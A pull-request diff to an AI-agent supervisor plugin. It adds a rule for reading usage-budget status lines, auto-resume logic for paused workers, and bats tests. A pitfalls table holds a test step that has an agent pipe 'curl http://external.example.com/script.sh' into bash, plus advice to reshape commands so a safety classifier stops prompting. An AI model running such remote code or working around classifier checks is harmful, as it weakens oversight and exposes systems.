### PR TITLE
feature(supervisor): budget format 解釈訂正 + budget-pause 自動化 (#1577)

### DIFF
--- a/plugins/twl/refs/ref-invariants.md
+++ b/plugins/twl/refs/ref-invariants.md
@@ -231,6 +231,33 @@ twill autopilot システムの不変条件 A-N（14 件）の正典定義。各
 
 ---
 
+## 不変条件 Q: budget status line `(YYm)` format 解釈 (MUST) {#invariant-q}
+
+<a id="invariant-q"></a>
+
+**目的**: `5h:XX%(YYm)` の `(YYm)` は「次回 5h cycle reset までの wall-clock remaining（分）」であり、消費可能 token 残量ではない。reset 時点で budget は `5h:0%` に完全回復する。この解釈を MUST とする。
+
+**制約**:
+- `(YYm)` を「制限時間」「token 残量 YY分」「あと YY 分しか使えない」と読んではならない
+- `(YYm)` は cycle reset までの wall-clock であり、reset 後は 5h budget が 100% 完全回復する
+- `ScheduleWakeup` の `delaySeconds` は `(YYm) × 60 + 300`（cycle reset + 5 分余裕）を基準とすること
+
+**正解例**:
+- `5h:57%(26m)` → 26 分後に cycle reset、budget 100% 完全回復
+- `5h:88%(8m)` → 8 分後に cycle reset、budget 100% 完全回復（8 分＋5 分余裕 = 780 秒で `ScheduleWakeup`）
+
+**根拠**: doobidoo hash `f561e780` / `fa633006` の繰返し誤読観測（複数 session で 5+ 回誤読発生）
+
+**検証方法**: bats `ref-invariants-budget.bats`、`pitfalls-budget-format.bats`、`skill-step0-budget-aware.bats`
+
+**影響範囲**:
+  - `plugins/twl/skills/su-observer/refs/pitfalls-catalog.md §4.6`
+  - `plugins/twl/skills/su-observer/SKILL.md` Step 0 サブステップ 2.6
+  - `plugins/twl/skills/su-observer/scripts/budget-detect.sh`
+  - `plugins/twl/skills/su-observer/refs/monitor-channel-catalog.md §BUDGET-LOW`
+
+---
+
 ## SU-* との境界
 
 SU-1〜SU-9 は Supervisor（su-observer）固有の application-level 制約であり、本ドキュメントの不変条件 A-N とは独立した体系である。SU-* の正典は [`architecture/domain/contexts/supervision.md`](../architecture/domain/contexts/supervision.md)（SSoT）。運用 mirror は [`skills/su-observer/refs/su-observer-constraints.md`](../skills/su-observer/refs/su-observer-constraints.md) を参照。Security gate (Layer A-D) 定義は [`skills/su-observer/refs/su-observer-security-gate.md`](../skills/su-observer/refs/su-observer-security-gate.md) を参照。

--- a/plugins/twl/scripts/pilot-fallback-monitor.sh
+++ b/plugins/twl/scripts/pilot-fallback-monitor.sh
@@ -257,6 +257,69 @@ _process_worker() {
 }
 
 # ---------------------------------------------------------------------------
+# budget-pause.json の expected_reset_at + 5min を過ぎた場合に paused Worker を resume
+# 不変条件 M との整合: orchestrator alive チェックの bypass 禁止。budget-pause 専用判定パスとして独立実装。
+# jq/date を使用（python3 はテスト環境でスタブ化される可能性があるため使用しない）
+# ---------------------------------------------------------------------------
+_check_budget_auto_resume() {
+  local budget_pause_file=".supervisor/budget-pause.json"
+  [[ -f "$budget_pause_file" ]] || return 0
+
+  # jq で JSON フィールドを抽出（python3 はテスト環境でスタブ化されるため jq を使用）
+  local status expected_reset_at auto_resume_via paused_at cycle_min
+  status=$(jq -r '.status // ""' "$budget_pause_file" 2>/dev/null || true)
+  [[ "$status" == "paused" ]] || return 0
+
+  expected_reset_at=$(jq -r '.expected_reset_at // ""' "$budget_pause_file" 2>/dev/null || true)
+  auto_resume_via=$(jq -r '.auto_resume_via // ""' "$budget_pause_file" 2>/dev/null || true)
+  paused_at=$(jq -r '.paused_at // ""' "$budget_pause_file" 2>/dev/null || true)
+  cycle_min=$(jq -r '.cycle_reset_minutes_at_pause // 0' "$budget_pause_file" 2>/dev/null || true)
+
+  # expected_reset_at が空の場合は paused_at + cycle_reset_minutes_at_pause から導出（不変条件 Q）
+  if [[ -z "$expected_reset_at" && -n "$paused_at" && "$cycle_min" =~ ^[0-9]+$ && "$cycle_min" -gt 0 ]]; then
+    local paused_epoch reset_epoch
+    paused_epoch=$(date -d "${paused_at}" +%s 2>/dev/null || echo "")
+    if [[ -n "$paused_epoch" ]]; then
+      reset_epoch=$(( paused_epoch + cycle_min * 60 ))
+      expected_reset_at=$(date -d "@${reset_epoch}" -u +"%Y-%m-%dT%H:%M:%SZ" 2>/dev/null || echo "")
+    fi
+  fi
+  [[ -n "$expected_reset_at" ]] || return 0
+
+  # expected_reset_at + 5min を過ぎているか確認（不変条件 Q: cycle reset + 5 分余裕）
+  local reset_epoch resume_epoch now_epoch
+  reset_epoch=$(date -d "${expected_reset_at}" +%s 2>/dev/null || echo "")
+  [[ -n "$reset_epoch" && "$reset_epoch" =~ ^[0-9]+$ ]] || return 0
+  resume_epoch=$(( reset_epoch + 5 * 60 ))
+  now_epoch=$(date +%s)
+  [[ "$now_epoch" -ge "$resume_epoch" ]] || return 0
+
+  echo "[pilot-fallback-monitor] budget-pause auto-resume: expected_reset_at+5min 経過 — paused Worker を resume します (auto_resume_via=${auto_resume_via})" >&2
+
+  # paused_workers を resume
+  local workers_list
+  workers_list=$(jq -r '.paused_workers[]? // empty' "$budget_pause_file" 2>/dev/null || true)
+  if [[ -n "$workers_list" ]]; then
+    while IFS= read -r worker_window; do
+      [[ -n "$worker_window" ]] || continue
+      # issue 番号を取得して inject（state read は python3 module だがスタブで対応済み）
+      local issue_num
+      issue_num=$(python3 -m twl.autopilot.state read --type window --window "$worker_window" --field issue 2>/dev/null || echo "")
+      if [[ -n "$issue_num" ]]; then
+        _inject_next_workflow "$worker_window" "$issue_num" || true
+      fi
+    done <<< "$workers_list"
+  fi
+
+  # budget-pause.json の status を resumed に更新（jq を使用）
+  local tmp_file
+  tmp_file=$(mktemp "${budget_pause_file}.XXXXXX")
+  jq --arg resumed_at "$(date -u +"%Y-%m-%dT%H:%M:%SZ")" \
+    '.status = "resumed" | .resumed_at = $resumed_at' \
+    "$budget_pause_file" > "$tmp_file" 2>/dev/null && mv "$tmp_file" "$budget_pause_file" || rm -f "$tmp_file"
+}
+
+# ---------------------------------------------------------------------------
 # 全 ap-* Worker に対してスキャン
 # ---------------------------------------------------------------------------
 _scan_all_workers() {
@@ -296,6 +359,10 @@ _scan_all_workers() {
 # ---------------------------------------------------------------------------
 # メインループ
 # ---------------------------------------------------------------------------
+# budget-pause auto-resume チェック（不変条件 Q: expected_reset_at + 5min 経過で resume）
+# 常に実行: --worker 指定時も含む（budget-pause 専用判定パスは独立実行）
+_check_budget_auto_resume
+
 if [[ -n "$WORKER_WINDOW" ]]; then
   _process_worker "$WORKER_WINDOW" "$ISSUE_NUM"
 else

--- a/plugins/twl/skills/su-observer/SKILL.md
+++ b/plugins/twl/skills/su-observer/SKILL.md
@@ -35,6 +35,11 @@ spawnable_by:
    - phase 情報は `phase_handoff` field を使用すること
    - なし → `${CLAUDE_PLUGIN_ROOT}/skills/su-observer/scripts/session-init.sh` で新規作成
 2.5. `.supervisor/budget-pause.json` 確認: `status: "paused"` → Worker 状態確認 → orchestrator 再起動 → `status: "resumed"` 更新 → `>>> budget 回復: 全セッション再開完了`
+2.6. **budget status line `5h:XX%(YYm)` format 解釈（不変条件 Q 準拠、MUST）**:
+   - (a) tmux status line から `5h:[0-9]+%\([0-9]+m\)` を抽出: `tmux display-message -p '#{status-right}' | grep -oE '5h:[0-9]+%\([0-9]+m\)'`
+   - (b) `(YYm)` は「次回 5h cycle reset までの wall-clock（分）」と認識する（MUST）。`(YYm)` ≠ token 残量、≠ 制限時間（[不変条件 Q](../../refs/ref-invariants.md#invariant-q) 参照）
+   - (c) `ScheduleWakeup` の `delaySeconds` は `(YYm) × 60 + 300`（cycle reset 直後 + 5 分余裕）に設定する
+   - (d) `.supervisor/budget-pause.json` の `status=paused` を確認した場合は `expected_reset_at` フィールドを読み、経過確認後に resume する（`pilot-fallback-monitor.sh` の `_check_budget_auto_resume` も参照）
 3. Project Board から Todo/In Progress の Issue 一覧を取得
 4. **Memory MCP（MUST）**: `${CLAUDE_PLUGIN_ROOT}/skills/su-observer/scripts/step0-memory-ambient.sh` → exit 0: `.supervisor/ambient-hints.md` Read; exit 1: `observer-pitfall`/`observer-lesson`/`observer-wave` タグで memory_search → `--write` 保存 → Read
 4.5. auto-memory はホストローカル補助のみ — cross-machine 知見 source として使用してはならない（MUST NOT）

--- a/plugins/twl/skills/su-observer/refs/monitor-channel-catalog.md
+++ b/plugins/twl/skills/su-observer/refs/monitor-channel-catalog.md
@@ -453,13 +453,15 @@ check_budget_low() {
    {
      "status": "paused",
      "paused_at": "<ISO 8601>",
-     "estimated_recovery": "<停止時刻 + 90分>",
-     "cron_id": "<CronCreate で設定したID>",
+     "cycle_reset_minutes_at_pause": 26,
+     "expected_reset_at": "<paused_at + cycle_reset_minutes_at_pause>",
+     "auto_resume_via": "schedulewakeup",
      "paused_workers": ["ap-569", "ap-570"],
      "orchestrator_pid": 12345
    }
    ```
-4. CronCreate で回復時刻（保守的推定: 停止時刻 + 90 分）に su-observer の再起動をスケジュール
+   **注意**: `(YYm)` = `cycle_reset_minutes_at_pause` = cycle reset までの wall-clock（分）。reset 後に 5h budget 100% 完全回復（[不変条件 Q](../../refs/ref-invariants.md#invariant-q)）。
+4. ScheduleWakeup で `cycle reset まで Z分（reset 後に 5h budget 100% 完全回復）`。`delaySeconds = (YYm) × 60 + 300`（cycle reset + 5 分余裕）
 
 **再開シーケンス（Step 0 の budget-pause.json 復帰パスで実行）:**
 

--- a/plugins/twl/skills/su-observer/refs/pitfalls-catalog.md
+++ b/plugins/twl/skills/su-observer/refs/pitfalls-catalog.md
@@ -145,10 +145,36 @@ stuck 発生時は `co-issue-aggregate-stuck` タグで以下を保存: Worker s
 | 4.3 | LLM の Thinking/Brewing/Concocting 中に STAGNATE を誤検知 | **A2 LLM indicator が存在する場合、[PHASE-COMPLETE]/[REVIEW-READY]/[MENU-READY]/[FREEFORM-READY]/[STAGNATE] を絶対に emit しない**（SKILL.md L110） |
 | 4.4 | `session-state.sh state` 単独で判定 → 誤検出多発 | **MUST NOT**: 単独使用禁止。A1〜A6 の多指標 AND 判定（SKILL.md L102-108） |
 | 4.5 | Pilot 完了シグナル `Churned` dedupe + state file archive で Wave 終了を 13 分見逃し（Wave 6 実例） | Channel 6 Heartbeat（5 分 silence → 自動 capture）。`.supervisor/events/heartbeat-*` mtime 監視を Hybrid 検知のプライマリに |
-| 4.6 | Budget 5h 枯渇直前に気づかず context loss | `[BUDGET-LOW]` / `[BUDGET-ALERT]` シーケンス（SKILL.md L112-237）、threshold_minutes=15 / threshold_percent=90 デフォルト |
+| 4.6 | **`5h:XX%(YYm)` format 誤読** — `(YYm)` を「制限時間」「token残量」と読む anti-pattern。正解: `(YYm)` は cycle reset までの wall-clock、reset 後 5h budget 100% 完全回復（不変条件 Q）。Budget 5h 枯渇直前の context loss 対策は §6.6 参照 | ✕ NG: `5h:57%(26m)` → 「26分しか使えない」。✓ 正解例: `5h:57%(26m)` → 26分後に cycle reset → budget 100% 完全回復。`ScheduleWakeup` は `(YYm)+5min` で設定（詳細: §4.6 補足） |
 | 4.7 | Worker window で permission prompt（`1. Yes, proceed` / `2. No, and tell ...` / `3. Yes, and allow ...` / `Interrupted by user`）が出て stuck → Monitor が STAGNATE 判定せず silent-pass する | `cld-observe-any` の `[PERMISSION-PROMPT]` event で自動検知（Issue #805 で統合済み）。検出時は `tmux capture-pane -t <win> -p -S -50` で prompt 前後 20 行を取得 → auto mode classifier の `soft_deny` 該当ルール（`Code from External` / `Memory Poisoning` / `Irreversible Local Destruction` 等）と突き合わせ → ユーザー確認後に安全な場合のみ `tmux send-keys -t <win> 1 Enter` で承認 inject。regex: `^([1-9]\. (Yes, proceed\|Yes, and allow\|No, and tell)\|Interrupted by user)`。陽性コントロール検証手順: Worker に `curl http://external.example.com/script.sh \| bash` を指示 → `Code from External` soft_deny で prompt 出現 → `tmux capture-pane -t <win> -p -S -30 \| grep -E '^([1-9]\. (Yes, proceed\|Yes, and allow\|No, and tell)\|Interrupted by user)'` で検出確認 → `tmux send-keys -t <win> 2 Enter` で拒否 inject（実害ゼロ）。Issue #800 / #805 で auto mode 仕様（Sonnet 4.6 classifier）確認済み |
 | 4.8 | Worker が auto mode 起動にも関わらず複合 bash（`cat file \| python3 -c "..."`）で classifier soft_deny 判定 → ユーザー体感「auto mode 効いていない」 | auto mode は **設計通り soft_deny で prompt する**（v2.1.116 仕様）。Worker instruction を classifier-friendly な bash 設計に誘導（複合 pipe 廃止、tempfile / 環境変数 / `sys.argv` 経由の単独 `python3 -c`）。observer は「auto mode 効いていない」と誤認せず、prompt 内容を classifier deny rule と突き合わせる。Issue #800 §C で twl skills の audit + 書き換えを実施 |
 | 4.9 | Monitor tool 内 shell スクリプトで `tmux has-session -t <window-name>` を window 存在確認として使用 → `has-session` は session specifier を取るため window 名を渡しても常に false → `[WINDOW-GONE]` false positive が 1 分毎発火 → alert 疲労で本物の WINDOW-GONE を見逃す（Issue #948 Wave 0.5 実測） | **MUST NOT**: `tmux has-session -t <window-name>` で window を確認してはならない。正しくは: 方法 A `tmux list-windows -a -F '#{window_name}' \| grep -Fxq <name>`、方法 B `tmux list-windows -t <session> -F '#{window_name}' \| grep -Fxq <name>`、方法 C `tmux display-message -t <session>:<name> -p '#{window_id}' 2>/dev/null`。共通ライブラリ `scripts/lib/observer-window-check.sh` の `_check_window_alive()` を使用。詳細は `refs/monitor-channel-catalog.md §window 存在確認の正しい方法` を参照 |
+
+#### §4.6 補足: `(YYm)` format 誤読 pitfall — 不変条件 Q
+
+**背景**: tmux status line `5h:XX%(YYm)` の `(YYm)` は次回 5h rolling budget cycle の reset までの wall-clock remaining（分）。token 残量や「あと XX 分しか使えない」という制限時間ではない。[不変条件 Q](../../refs/ref-invariants.md#invariant-q) として正典化済み。
+
+**✕ NG 例 — anti-pattern**:
+- `5h:57%(26m)` を「token 残量 26 分分しかない、停止すべき」と読む
+- `(26m)` = 「制限時間 26 分」と解釈して不必要な budget-pause を発動する
+- `(YYm)` を消費可能 token 残量（分）と混同する
+
+**✓ 正解例**:
+- `5h:57%(26m)` → **26 分後に 5h cycle が reset → budget 100% 完全回復**
+- `5h:88%(8m)` → **8 分後に 5h cycle が reset → budget 100% 完全回復**
+- `ScheduleWakeup` の `delaySeconds` は `(YYm) × 60 + 300`（cycle reset 直後 + 5 分余裕）に設定する
+
+**具体例**:
+```
+status: 5h:57%(26m)
+         ↑↑↑   ↑↑↑
+     token 消費 57%  cycle reset まで 26 分
+                     ↓
+           26 分後: budget 5h:0% に完全回復
+           ScheduleWakeup: delaySeconds = 26*60+300 = 1860
+```
+
+**参照**: [不変条件 Q](../../refs/ref-invariants.md#invariant-q)、`budget-detect.sh`（`budget-pause.json` の `cycle_reset_minutes_at_pause` / `expected_reset_at` フィールド）
 
 #### §4.7-4.8 補足: Worker auto mode 有効性確認方法
 

--- a/plugins/twl/skills/su-observer/scripts/budget-detect.sh
+++ b/plugins/twl/skills/su-observer/scripts/budget-detect.sh
@@ -87,7 +87,7 @@ if [[ "$BUDGET_ALERT" != "true" ]]; then
   exit 0
 fi
 
-echo "[BUDGET-LOW] 5h budget: token残量 ${BUDGET_REMAINING_MIN:-?}分 (${BUDGET_PCT:-?}% 消費), cycle reset まで ${BUDGET_CYCLE_MIN:-?}分。安全停止シーケンスを開始します。"
+echo "[BUDGET-LOW] 5h budget: token残量 ${BUDGET_REMAINING_MIN:-?}分 (${BUDGET_PCT:-?}% 消費), cycle reset まで ${BUDGET_CYCLE_MIN:-?}分（reset 後 5h budget 100% 完全回復）。安全停止シーケンスを開始します。"
 
 # 1. orchestrator 停止（PID 数値バリデーション必須: kill 0 はプロセスグループ全体を対象とするため禁止）
 ORCH_PID=$(cat "${AUTOPILOT_DIR}/orchestrator.pid" 2>/dev/null || pgrep -f 'autopilot-orchestrator' | head -1 || echo "")
@@ -109,22 +109,30 @@ PAUSED_WORKERS_RAW=$(printf '%s\n' "${PAUSED_WORKERS[@]:-}")
 WORKERS_JSON=$(PAUSED_WORKERS_RAW="$PAUSED_WORKERS_RAW" python3 -c \
   'import os, json; lines = os.environ.get("PAUSED_WORKERS_RAW", "").splitlines(); print(json.dumps([l.strip() for l in lines if l.strip()]))')
 ORCH_PID_SAFE="${ORCH_PID:-}"
+BUDGET_CYCLE_MIN_SAFE="${BUDGET_CYCLE_MIN:-0}"
 python3 -c "
 import json, datetime, os
 workers = json.loads(os.environ.get('WORKERS_JSON', '[]'))
 orch_pid_str = os.environ.get('ORCH_PID_SAFE', '')
 orch_pid = int(orch_pid_str) if orch_pid_str.isdigit() else None
+cycle_min_str = os.environ.get('BUDGET_CYCLE_MIN_SAFE', '0')
+cycle_min = int(cycle_min_str) if cycle_min_str.isdigit() else 0
+now = datetime.datetime.utcnow()
+expected_reset_at = (now + datetime.timedelta(minutes=cycle_min)).isoformat() + 'Z'
 data = {
   'status': 'paused',
-  'paused_at': datetime.datetime.utcnow().isoformat() + 'Z',
-  'estimated_recovery': (datetime.datetime.utcnow() + datetime.timedelta(minutes=90)).isoformat() + 'Z',
+  'paused_at': now.isoformat() + 'Z',
+  'cycle_reset_minutes_at_pause': cycle_min,
+  'expected_reset_at': expected_reset_at,
+  'auto_resume_via': 'schedulewakeup',
   'paused_workers': workers,
   'orchestrator_pid': orch_pid
 }
 json.dump(data, open('.supervisor/budget-pause.json', 'w'), indent=2)
 " 2>/dev/null
 
-# 4. CronCreate で回復時刻に自動再開をスケジュール（LLM が文脈で実行する）
-echo "[BUDGET-LOW] CronCreate で budget 回復後の自動再開をスケジュールしてください（90 分後）。"
+# 4. ScheduleWakeup で cycle reset 直後に自動再開（cycle reset + 5 分余裕）
+DELAY_SECONDS=$(( (${BUDGET_CYCLE_MIN:-0} + 5) * 60 ))
+echo "[BUDGET-LOW] ScheduleWakeup で cycle reset 後の自動再開をスケジュールしてください（cycle reset まで ${BUDGET_CYCLE_MIN:-?}分、delaySeconds=${DELAY_SECONDS}）。"
 
 exit 1

--- a/plugins/twl/tests/bats/invariants/ref-invariants-budget.bats
+++ b/plugins/twl/tests/bats/invariants/ref-invariants-budget.bats
@@ -4,7 +4,12 @@
 # AC1: plugins/twl/refs/ref-invariants.md に不変条件 Q を新設する
 #      （budget status line の (YYm) 解釈）
 #
-# 重要な前提: 不変条件 P は既存（L205）。本 Issue で追加するのは不変条件 Q。
+# 【命名決定】Issue #1577 の AC1/AC7 は「不変条件 P」と記載しているが、
+# 不変条件 P は Issue #1578 (PR #1591) で「Issue 起票 flow 大原則」として
+# 既に使用済み（ref-invariants.md L205）。
+# そのため、budget format 不変条件は「不変条件 Q」として実装する。
+# 実装者はこのファイルの不変条件 Q アサーションに従い、不変条件 Q を実装すること。
+# （AC に「不変条件 P」と書かれていても「不変条件 Q」で実装する）
 #
 # RED: 全テストは実装前の状態で fail する
 

--- a/plugins/twl/tests/bats/invariants/ref-invariants-budget.bats
+++ b/plugins/twl/tests/bats/invariants/ref-invariants-budget.bats
@@ -68,9 +68,9 @@ sys.exit(0)
   grep -qE '<a id="invariant-q' "$REF_FILE"
 }
 
-@test "ac1: ref-invariants.md の不変条件セクション数が P + Q で 16 以上になる" {
+@test "ac1: ref-invariants.md の不変条件セクション数が P + Q で 17 以上になる" {
   # AC: 不変条件 Q 追加後はセクション数が増加する
-  # RED: 現在は P まで（15 個: A-O + P = 16 個）の状態で Q が存在しないため 16 で fail する
+  # RED: 現在は P まで（15 個: A-O + P = 16 個）の状態で Q が存在しないため 17 で fail する
   [ -f "$REF_FILE" ]
   local count
   count=$(grep -c "^## 不変条件 [A-Z]:" "$REF_FILE")

--- a/plugins/twl/tests/bats/invariants/ref-invariants-budget.bats
+++ b/plugins/twl/tests/bats/invariants/ref-invariants-budget.bats
@@ -1,0 +1,94 @@
+#!/usr/bin/env bats
+# ref-invariants-budget.bats - TDD RED phase tests for Issue #1577 AC1
+#
+# AC1: plugins/twl/refs/ref-invariants.md に不変条件 Q を新設する
+#      （budget status line の (YYm) 解釈）
+#
+# 重要な前提: 不変条件 P は既存（L205）。本 Issue で追加するのは不変条件 Q。
+#
+# RED: 全テストは実装前の状態で fail する
+
+setup() {
+  local this_dir
+  this_dir="$(cd "$(dirname "$BATS_TEST_FILENAME")" && pwd)"
+  local bats_dir
+  bats_dir="$(cd "${this_dir}/.." && pwd)"
+  local tests_dir
+  tests_dir="$(cd "${bats_dir}/.." && pwd)"
+  REPO_ROOT="$(cd "${tests_dir}/.." && pwd)"
+  export REPO_ROOT
+
+  REF_FILE="${REPO_ROOT}/refs/ref-invariants.md"
+  export REF_FILE
+}
+
+# ===========================================================================
+# AC1: 不変条件 Q セクションの存在チェック
+# RED: 不変条件 Q は未追加なため全テストが fail する
+# ===========================================================================
+
+@test "ac1: ref-invariants.md に 不変条件 Q セクションが存在する" {
+  # AC: ref-invariants.md に不変条件 Q を新設する（budget status line の (YYm) 解釈）
+  # RED: 実装前は fail する — 不変条件 Q が存在しない
+  [ -f "$REF_FILE" ]
+  grep -q "^## 不変条件 Q:" "$REF_FILE"
+}
+
+@test "ac1: 不変条件 Q セクションに budget status line (YYm) の説明が含まれる" {
+  # AC: budget status line の (YYm) 解釈を不変条件として明文化
+  # RED: 実装前は fail する — 不変条件 Q が存在しない
+  [ -f "$REF_FILE" ]
+  python3 -c "
+import sys, re
+with open('$REF_FILE') as f:
+    content = f.read()
+m = re.search(r'## 不変条件 Q:.*?(?=^## |\Z)', content, re.DOTALL | re.MULTILINE)
+if not m:
+    print('不変条件 Q section not found')
+    sys.exit(1)
+section = m.group(0)
+has_yymin = ('YYm' in section or '(YYm)' in section)
+has_cycle = ('cycle reset' in section or 'cycle_reset' in section)
+if not (has_yymin and has_cycle):
+    print('(YYm) cycle reset wall-clock description not found in 不変条件 Q')
+    sys.exit(1)
+sys.exit(0)
+"
+}
+
+@test "ac1: 不変条件 Q セクションに budget_status_line アンカーが存在する" {
+  # AC: 他ファイルから参照可能なアンカーが設定されていること
+  # RED: 実装前は fail する — 不変条件 Q セクション自体が存在しない
+  [ -f "$REF_FILE" ]
+  grep -qE '<a id="invariant-q' "$REF_FILE"
+}
+
+@test "ac1: ref-invariants.md の不変条件セクション数が P + Q で 16 以上になる" {
+  # AC: 不変条件 Q 追加後はセクション数が増加する
+  # RED: 現在は P まで（15 個: A-O + P = 16 個）の状態で Q が存在しないため 16 で fail する
+  [ -f "$REF_FILE" ]
+  local count
+  count=$(grep -c "^## 不変条件 [A-Z]:" "$REF_FILE")
+  # 不変条件 Q 追加後は 17 以上になるはず（現在 A-P = 16）
+  [ "$count" -ge 17 ]
+}
+
+@test "ac1: 不変条件 Q に 根拠フィールドが存在する" {
+  # AC: 不変条件 Q は根拠を持つこと（ADR 参照または説明文）
+  # RED: 実装前は fail する — 不変条件 Q が存在しない
+  [ -f "$REF_FILE" ]
+  python3 -c "
+import sys, re
+with open('$REF_FILE') as f:
+    content = f.read()
+m = re.search(r'## 不変条件 Q:.*?(?=^## |\Z)', content, re.DOTALL | re.MULTILINE)
+if not m:
+    print('不変条件 Q section not found')
+    sys.exit(1)
+section = m.group(0)
+if '根拠' not in section and '**根拠**' not in section:
+    print('根拠フィールドが不変条件 Q に存在しない')
+    sys.exit(1)
+sys.exit(0)
+"
+}

--- a/plugins/twl/tests/bats/invariants/ref-invariants-structure.bats
+++ b/plugins/twl/tests/bats/invariants/ref-invariants-structure.bats
@@ -406,3 +406,32 @@ sys.exit(0)
   # 合計カウント表記（例: "Refs: 19" または "19 refs" など）を検出
   grep -qE 'Refs.*19|19.*[Rr]ef' "$README_FILE"
 }
+
+# ===========================================================================
+# Issue #1577: 不変条件 Q 追加後のカウントアサーション
+# Scenario: 不変条件 Q（budget status line の (YYm) 解釈）追加後の section 数検証
+# WHEN: ref-invariants.md に不変条件 Q を追加した後
+# THEN: [A-Z] pattern の不変条件セクション数が 17 以上になる（A-P=16 + Q=17）
+#
+# 背景: 不変条件 A-M (13件) → N/O/P 追加で 16 件（Issue #1577 実装前時点）
+#       Issue #1577 で Q を追加 → 17 件になること
+# RED: 実装前は fail する — 不変条件 Q が存在しないため count = 16 < 17
+# ===========================================================================
+
+@test "ref-invariants: 不変条件 Q 追加後: section 数が 17 以上になる (Issue #1577)" {
+  # AC1: ref-invariants.md に不変条件 Q を新設した後の構造検証
+  # RED: 実装前は fail する — Q が存在せず count=16 のため [ 16 -ge 17 ] が false
+  local count
+  count=$(grep -c "^## 不変条件 [A-Z]:" "$REF_FILE")
+  [ "$count" -ge 17 ] || {
+    echo "FAIL: 不変条件 Q が未追加。現在のセクション数: ${count}（期待: 17 以上）"
+    grep "^## 不変条件 [A-Z]:" "$REF_FILE" || true
+    return 1
+  }
+}
+
+@test "ref-invariants: 不変条件 Q セクションが存在する (Issue #1577)" {
+  # AC1: 不変条件 Q の具体的な存在確認
+  # RED: 実装前は fail する — 不変条件 Q が存在しない
+  grep -q "^## 不変条件 Q:" "$REF_FILE"
+}

--- a/plugins/twl/tests/bats/observer/skill-step0-budget-aware.bats
+++ b/plugins/twl/tests/bats/observer/skill-step0-budget-aware.bats
@@ -130,3 +130,40 @@ if '不変条件 Q' not in substep_text and 'invariant-q' not in substep_text.lo
 sys.exit(0)
 "
 }
+
+@test "ac6: SKILL.md Step 0 サブステップ 2.6 が ScheduleWakeup の delaySeconds 計算式を含む" {
+  # AC: 2.6(c) で ScheduleWakeup delaySeconds = (YYm) × 60 + 300 の計算式を明示すること
+  [ -f "$SKILL_MD" ]
+  python3 -c "
+import sys, re
+with open('$SKILL_MD') as f:
+    content = f.read()
+step0_m = re.search(r'## Step 0:.*?(?=^## Step [1-9]|\Z)', content, re.DOTALL | re.MULTILINE)
+if not step0_m:
+    print('Step 0 not found')
+    sys.exit(1)
+step0 = step0_m.group(0)
+lines = step0.splitlines()
+idx = None
+for i, line in enumerate(lines):
+    if '2.6' in line:
+        idx = i
+        break
+if idx is None:
+    print('2.6 not found in Step 0')
+    sys.exit(1)
+# 2.6 から次のサブステップ（2.7 or 3.）まで
+substep_block = []
+for line in lines[idx:]:
+    if re.match(r'\s*[23]\.[0-9]+\.', line) and line.strip().startswith(('2.7', '2.8', '2.9', '3.')):
+        break
+    substep_block.append(line)
+substep_text = '\n'.join(substep_block)
+has_schedulewakeup = 'ScheduleWakeup' in substep_text
+has_delay_seconds = 'delaySeconds' in substep_text
+if not (has_schedulewakeup and has_delay_seconds):
+    print(f'ScheduleWakeup={has_schedulewakeup}, delaySeconds={has_delay_seconds}: 計算式が不足')
+    sys.exit(1)
+sys.exit(0)
+"
+}

--- a/plugins/twl/tests/bats/observer/skill-step0-budget-aware.bats
+++ b/plugins/twl/tests/bats/observer/skill-step0-budget-aware.bats
@@ -1,0 +1,132 @@
+#!/usr/bin/env bats
+# skill-step0-budget-aware.bats - TDD RED phase tests for Issue #1577 AC6
+#
+# AC6: plugins/twl/skills/su-observer/SKILL.md の Step 0 サブステップ 2.6 を新設
+#
+# 背景: 現在 Step 0 のサブステップは 2.5 まで存在する（budget-pause.json 確認）。
+#       AC6 では 2.6 として budget status line の (YYm) 解釈に関する awareness 手順を追加する。
+#
+# RED: 全テストは実装前の状態で fail する
+
+setup() {
+  local this_dir
+  this_dir="$(cd "$(dirname "$BATS_TEST_FILENAME")" && pwd)"
+  local bats_dir
+  bats_dir="$(cd "${this_dir}/.." && pwd)"
+  local tests_dir
+  tests_dir="$(cd "${bats_dir}/.." && pwd)"
+  REPO_ROOT="$(cd "${tests_dir}/.." && pwd)"
+  export REPO_ROOT
+
+  SKILL_MD="${REPO_ROOT}/skills/su-observer/SKILL.md"
+  export SKILL_MD
+}
+
+# ===========================================================================
+# AC6: Step 0 サブステップ 2.6 の存在チェック
+# RED: 現時点では 2.6 が存在しないため全テストが fail する
+# ===========================================================================
+
+@test "ac6: SKILL.md Step 0 に サブステップ 2.6 が存在する" {
+  # AC: SKILL.md の Step 0 サブステップ 2.6 を新設
+  # RED: 実装前は fail する — 2.6 が存在しない
+  [ -f "$SKILL_MD" ]
+  grep -q "2\.6\." "$SKILL_MD"
+}
+
+@test "ac6: SKILL.md Step 0 サブステップ 2.6 が budget status line の (YYm) 解釈に関する記述を含む" {
+  # AC: 2.6 は budget format disambiguator として (YYm) = cycle reset wall-clock を明示する
+  # RED: 実装前は fail する — 2.6 が存在しない
+  [ -f "$SKILL_MD" ]
+  python3 -c "
+import sys, re
+with open('$SKILL_MD') as f:
+    content = f.read()
+# Step 0 セクション内を取得
+step0_m = re.search(r'## Step 0:.*?(?=^## Step [1-9]|\Z)', content, re.DOTALL | re.MULTILINE)
+if not step0_m:
+    print('Step 0 section not found in SKILL.md')
+    sys.exit(1)
+step0 = step0_m.group(0)
+# 2.6 サブステップが存在すること
+if '2.6' not in step0:
+    print('Substep 2.6 not found in Step 0')
+    sys.exit(1)
+# 2.6 サブステップに (YYm) または cycle reset の記述があること
+lines = step0.splitlines()
+idx = None
+for i, line in enumerate(lines):
+    if '2.6' in line:
+        idx = i
+        break
+if idx is None:
+    print('2.6 line not found in Step 0')
+    sys.exit(1)
+substep_text = '\n'.join(lines[idx:idx+5])
+has_yymin = ('YYm' in substep_text or '(YYm)' in substep_text)
+has_cycle_or_budget = ('cycle' in substep_text or 'budget' in substep_text.lower())
+if not (has_yymin or has_cycle_or_budget):
+    print('(YYm) / cycle reset description not found in substep 2.6')
+    sys.exit(1)
+sys.exit(0)
+"
+}
+
+@test "ac6: SKILL.md Step 0 の順序は 2.5 の次に 2.6 が配置されている" {
+  # AC: サブステップの順序が正しいこと
+  # RED: 実装前は fail する — 2.6 が存在しない
+  [ -f "$SKILL_MD" ]
+  python3 -c "
+import sys
+with open('$SKILL_MD') as f:
+    content = f.read()
+lines = content.splitlines()
+idx_25 = None
+idx_26 = None
+for i, line in enumerate(lines):
+    if '2.5.' in line and idx_25 is None:
+        idx_25 = i
+    if '2.6.' in line and idx_26 is None:
+        idx_26 = i
